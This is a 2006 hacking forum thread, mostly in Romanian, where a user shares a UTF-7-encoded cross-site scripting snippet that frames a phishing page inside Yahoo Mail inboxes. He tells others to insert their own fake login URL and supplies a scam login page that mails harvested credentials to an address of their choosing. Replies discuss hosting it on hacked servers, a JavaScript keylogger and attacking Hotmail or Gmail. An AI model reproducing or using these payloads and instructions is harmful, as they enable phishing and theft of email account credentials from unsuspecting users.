Guest Nemessis Posted August 6, 2006 Report Posted August 6, 2006 Acest script creeaza un frame direct din inboxul victimei pentru a fi redirectionata catre scamul vostru. Este necesar sa aveti pusa sus o pagina de login fara bannere. Inlocuiti linkul de mai jos cu linkul catre site-ul vostru. <meta http-equiv="Content-Type" content="text/html; charset=UTF-7"> <html> <style_ html> <frame frameborder=0 src=http://us.f370.mail.yahoo.5u.com/index2.html><frameset>'))">Reparat de mine folosind un script mai vechi si folosind UTF-7 encoding. Nu il imprastiati pe unde apucati pentru ca veti ramane fara el. Urmeaza exploitul de cookies foarte curand. Quote
th0r Posted August 7, 2006 Report Posted August 7, 2006 Mind to explain it a little in English nemessis? Sorry not to know about romanian language >,<Thanks.Th0R Quote
Guest Nemessis Posted August 7, 2006 Report Posted August 7, 2006 This script can create frames in Yahoo inboxes. Send this script to somebody and when the guy is reading the mail he will be redirected automatically to a scam page (your scam page). The best thing is that the url remain the same so this scam looks really good and is more effective. To make this script work for you, change the "src=http://us.f370.mail.yahoo.5u.com/index2.html" line with your fake login url. Works only on IE. Quote
th0r Posted August 7, 2006 Report Posted August 7, 2006 WOW .. Nice find dude .. Thanks a lot anyway ..I used to think something like this for Hotmail / Gmail and tried quite a lot of things regarding to XSS, but i have no luck doing it so .. o.O any idea about hacking hotmail / gmail??Thanks.Th0R Quote
PsYKid Posted August 7, 2006 Report Posted August 7, 2006 Nemesis ..te rog pune si scamu ..l`am cautat peste tot ...dar nu`l gasesc .HTML+PHP . Multumesc.Thor: I just asked him to put the scam pages...cos i didn`t found some good ones. Multumesc incaodata Nemesis ...You The mAN! :@ :@ :@ :@ Quote
Guest Nemessis Posted August 7, 2006 Report Posted August 7, 2006 http://nemessis.info/expire.html. Copy the source and modify the email adress from the source (ctrl+f and search punct.punct@yahoo.com then modify). There is no php script because i preffer mailgates Quote
PsYKid Posted August 7, 2006 Report Posted August 7, 2006 The recipient address is unknownThe address you are trying to send to (hipercritic@yahoo.com) is not authorized to receive mail via this gateway. Please contact the webmaster of the page that referred you to this link and inform them they will no longer be able to use this function to send mail to [email]hipercritic@yahoo.com[/email]. If you feel this error is incorrect and that you should be able to send mail via this gateway, please contact the ISP that referred you to the mailgate servicewell nemesis ...ce`am facut rau ? Quote
Guest Nemessis Posted August 7, 2006 Report Posted August 7, 2006 The recipient address is unknown The address you are trying to send to (hipercritic@yahoo.com) is not authorized to receive mail via this gateway. Hostingul nu permite acel form. Try another Nu uita ca nu trebuie sa apara bannere sau pop-up. Quote
PsYKid Posted August 7, 2006 Report Posted August 7, 2006 Pai stai oleak ...adica tre sa schimb mailu ? no yahoo,hotmail and shit ? Quote
Guest Nemessis Posted August 7, 2006 Report Posted August 7, 2006 Hostingul. Ai urcat pagina pe un server ce nu permite acel form de mailgate. Ca proba poti incerca pe un domeniu de Geocities si vei vedea ca merge (dar nu face treaba cu el pentru ca apar bannere). Quote
th0r Posted August 7, 2006 Report Posted August 7, 2006 I heard somekind like .. Hackers using onKeyDown functions of javascript in order to depress any key stroke .. So they can do something like keylogging on some vulnerable sites .. Do u think that we can do something like that in yahoo??Because it says that XSS using this kind of scripts can be executed on most of the browser .. Including IE and FireFox .. The only way to avoid this is turned off the Java ..Thanks PsYKiD .. Hehehe ..I will try to understand more about romanian >,<Sorry to disturb ..Edited :: I tried to sent an email with that code included .. But it seems that it will shows the entire code and nothng happened on yahoo .. Any idea about that??Thanks.Th0R Quote
Guest Nemessis Posted August 7, 2006 Report Posted August 7, 2006 I really don't know exactly what you mean but there is some javascript keylogger who works but is not compiled yet to send the data's to "hackers". For a POC check http://sec.drorshalev.com the "JS Type logger" demo. Quote
th0r Posted August 7, 2006 Report Posted August 7, 2006 Anyway nemessis ..I tried ur tricks up there .. But it doesnt worked .. Even with IE ..Any idea .. ??Thanks.Th0R Quote
Guest Nemessis Posted August 7, 2006 Report Posted August 7, 2006 Full source: http://rapidshare.de/files/28553738/YahRed...t_2006.rar.htmlPasswd: nemessisth0r? What tricks? The logger or the yahoo redirect? Both of them works. The logger will show you the keystrokes typed by you in the bottom left corner of your browser (IE only). And the redirect works, just find a good hosting provider (or some hacked webserver) who accept the mailgate form submission for your scam page. Quote
th0r Posted August 8, 2006 Report Posted August 8, 2006 Ok .. I will try it again ..Anyway ..Thanks dude ..Thanks.Th0R Quote
Sad_Dreamer Posted August 11, 2006 Report Posted August 11, 2006 nu mi-a tinut deloc se prind repede din pacate Quote
Guest Nemessis Posted August 11, 2006 Report Posted August 11, 2006 O pot face mult mai reala Mi-a fost lene dar o fac maine Quote
Sad_Dreamer Posted August 11, 2006 Report Posted August 11, 2006 chestia e ca nu tzine...adica omu' deschide mailu' si ce vede? o alta pagina unde sa se logheze..isi da seama ca e phishing mai ales daca e unu mai destept...isi da seama si nah..poa' sa dea si eu un view source si vede ca e HTML pe cand yahoo e facut un php + ca se vede si mailul nu cred ca e cine stie ce faza..ar trebui facuta public Quote
Guest Nemessis Posted August 12, 2006 Report Posted August 12, 2006 Pot face sa apara pagina cu session expired iar apoi sa apara loginul (toate cu url-ul de la yahoo). Asa era inainte dar am pierdut scripturile si mi-a fost lene sa mai fac altele. Plus ca pot da disable la click dreapta si sa criptez sursa in ultimul hal . Quote
eddie47 Posted August 12, 2006 Report Posted August 12, 2006 <div class='quotetop'>QUOTE("Kw3[R)</div>Ln wrote: asta o postezi la VIP Quote
nos Posted August 12, 2006 Report Posted August 12, 2006 ba baieti 1.ori sunt yo prost de nu stiu sa fac2.ori numai merge metoda3.ori e de la host4.cand deschid html pe pagina proprie ma redirectioneaza cand imi trimit mie pe mail nu ma redirectioneaza5.mereu am deschis cu internet explorer6.cand deschid p calcu propriu imi apare o daia cu pop-up de blocare oare de la aia sa fie7.am increcat pe 4 hostin-uri au tyoate functia de mail activa dar nu ma redirectioneaza8.am incercat si pe altcinevacare e problema uite le pun pe amandoua fisiere sa imi spuneti daca e ceva gresit......http://rapidshare.ro/download.php?id=0dbbQ...cGxJqH0yXOu8y6R :@ :@ Quote
Guest Nemessis Posted August 12, 2006 Report Posted August 12, 2006 Damn man. Patched deja. Revin cu update la ea. Quote
